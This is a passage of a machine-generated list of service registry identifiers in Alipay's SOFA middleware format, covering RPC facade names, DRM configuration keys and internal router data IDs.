ardbinMdmTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.customerTairCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:zongmngtestapp-ldc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.mma.facade.api.dingtalk.UserContextFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.signorder.SignOrderQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:bizprodmng@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.businessPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transferprod.common.service.facade.api.BlacklistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:merchantConfirmTimeoutHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.QualityCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.insmobileTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.tax.TaxQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.151.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.ops.OpsCacheFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ipsponsorprod.common.service.facade.api.message.LifeMsgSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.arater.common.service.triple.RateConsumeRecordStatus:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundAbnormalRefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insscenemarket.common.facade.InsMktTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.product.ProductConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.figureGrayConfigString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:imobilegmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.client.api.PDFSignClientApi:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.task.facade.TaskFlowQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.task.facade.PayTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.antha.ha.AnthaQuestionRecordManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.UnionPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceExecuteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:finmng-vtableAuditPMCCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.publicrelation.MiniAppPublicBindFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.CloudTraceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.api.ApiDocTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.151.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.limit.PaymentmngDeployGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:developertool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FundTradeRefundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.219.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insttune.common.service.facade.backend.MessageCallbackService:1.0:insttune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecodec.common.spi.service.MobileCodecRouteService:1.0:barcodeprod_gzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkcreditmodel.common.service.facade.CreditModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue45#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Sub_Servers_TP_S_2112#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.154.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imatchfacade.arrange.ArrangeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauditcenter.facade.AuditResourceTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.TemplateConfigOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.PaymentResultQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.EntityManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:sccore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.core.api.HyCheckTaskRunService:1.0:ar-tool-sign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.20.146.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizfundprod.common.service.facade.transfer.BatchTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.AuthorizationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:fporgassetcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_INVOICE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchasset.common.service.facade.ceres.AssetCeresQuotationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.AnnualBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:drm-demo-web@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ebillcenter.common.service.facade.EbillProductCallbackFacade:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.promotion.common.service.facade.api.activitymanage.BudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.cloudinc.core.antvip.AntvipDrmControl.queryNamelistRoundSleepTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkloansceneprod.data.MemberInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@darwin#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finfocore:name=com.alipay.cif.model.cache.CifCOControlSwitch.readCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alphad.common.service.facade.dataset.api.IDatasetProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_dchainassetreg_service#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openeco.acl.common.service.facade.IMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.BasicRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frdspcore.common.service.facade.api.EventRecordProcessNodeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipaycore.common.service.spi.ExternalAssetFluxService:1.0:ibizassetcore-asset-tool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iexchange.service.inner.ForeignExchangeTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.core.inner.api.AccountFinalizerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.test:name=com.alipay.fc.iriskperceptcenter.rpoints.drm.RpointsCommonConfigResource.indicatorRiskMapDeepAnalysisDownloadLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.approdcenter:name=com.alipay.ap.prodcenter.client.Cache.base.refreshInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxagg.common.service.facade.api.management.datasource.DataSourceFilterMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.SyncXBTransOrderDrm.subFundOrderNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.echo.platform.core.drm.EchoRecordConfigDrm.recordConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.sysBlessMinStarWishCreateTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.merchant.MrchProdBankCardOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mm_openDemandAccount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.isv.IsvSignQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alidevice.biz.devicemanager.iotpaysdk.service.WhiteListAutoUnbindService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontent.common.service.facade.api.content.CommonContentQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-intranetproxy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.qc.QcTimedTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_OVERSEAPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:wealthyebtwa#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insautomarket.common.facade.product.AutoMktPublishedConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mmtcaftscv@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.core.service.emulator.common.logsim.reqlogjsonbuilder.OeEmulatorReqLogJsonBuilderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ivostro.facade.api.VirtualAccountOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.25.176.44#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oceanbase.obforumcore.service.market.buyer.OrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:fppolicyfindx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finqaunion@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.model.MdpModelSecurityInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxquote.service.facade.api.IfxQuoteRelationshipFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.secucns.api.SceneRuleConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.common.policy.surrender@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.appclient.process.ProcessTaskAccessor:1.0:antprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.alsc.reservation.backend.AlscReservationRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferPresetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbdishGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-alipaypointmc-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.226.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finbaservice.common.service.facade.contactmanage.api.FinancingNotifyTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.common.service.facade.meshy.AlertInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.group.GroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientLineageDRM.traceBoolRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpaas:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerAnyCorsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zmp.facade.MockSendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:ebillcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.174.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_192.168.203.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finadvisorcenter.common.service.fixedinvestment.facade.FixedInvestInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.module.merchant.facade.api.MerchantQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitPluginQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.facade.QueryTrustLoginTokenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkpromofront.facade.group.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.antha.AnthaQuestionTagDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucns.common.service.facade.SceneRuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.icontrol.common.service.facade.dispatch.IcVdnOnlineDispatchCsConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.terminal.facade.TerminalWriteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.thor.service.ThorStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exriskcenter.biz.shard.exposure.RiskExposureBuilderManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskQueryService:1.0.0:sofa4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TEST_TOPIC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zcbmarketcenter:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.1.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.girisk.common.service.facade.api.monitorbase.OnOffLineTableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.70.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.routeclient.interfacename:memberprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiancore.common.service.InsPolicyTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.idataprocessor.service.facade.api.IDataProcessMsgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.user.UserInfoQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderAuditLogService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.catalog.CatalogMngQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetinsight.common.service.facade.api.FundEvaluationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincontentweb.api.FmsMediaListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.oplog.OplogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsmp.common.service.facade.security.SecurityConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.zcache.tbase.socialTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pvsofaserver:name=com.alipay.zdal.ldc.tair.yingxutestRZTBaseCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.mosng.endpoint.facade.InstanceRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:exratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paylink.service.facade.ActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.cicada.facade.api.BrandWallCreateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.115#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finslip.common.service.facade.notify.RemedyNotifyGzoneService:1.0:remedyFinCompose@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.common.service.facade.api.navigation.MenuConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue24#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:finfoServiceAppApplyCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrisk.common.service.InsRiskInfoSecFacade:1.0:gzone@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.PasswordNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.instfluxcore.common.service.facade.inst.order.InstAcceptanceCallbackService:1.0:instpay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=midas.client.MidasClientStabilityDRMControl.recordSendPeak,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.214.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.ShopCardGzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instfund.facade.api.InstFundMonitorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininsightmng.common.service.facade.feature.api.AdviserFactorClassifyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:habaseline_EntityDiagnosisService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.openhome:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.71.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchasset.common.service.facade.purchases.AssetPurchasesQuotationOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:${filefactory_unique_id}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:templateAuditProcessCallbackImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.payacceptance.AgrtProdConfirmManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paygridprod.common.facade.CommonQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.discount.RtCampService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.127.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.159.40.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.virtualprod.common.service.facade.educate.sign.EduUserUnsignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.category.facade.BasicCategoryTreeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.deliverToTqpGrayPercentage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.common.manage.facade.api.solution.XcodeProcessorManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.divide.DivideStatisticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.manage.api.IinnerSendRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.188.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.downgradeSprTotalProfitPlanIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apyunqing.facade.DeploySpecFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.protocol-https:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:exriskcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.mosng.endpoint.inner.BoltService:1.0:test-1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.EvaluateTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecision.service.api.PayChannelConsultDecisionService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:xauthmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.common.service.integration.gotone.SendSmsServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:trustdatachain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipaymentmng.common.service.facade.TransferRecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.ResourceNodeSpecFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:securitydataservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.etetestcore.service.api.DeductService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.company.facade.CompanySolutionMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1221#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:icontrol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antflow.common.base.msq.MsgService:1.0:antflow.msq.proxy-11.124.141.150@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.CtuEventNameQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.workflowxTBaseCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.154.92#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.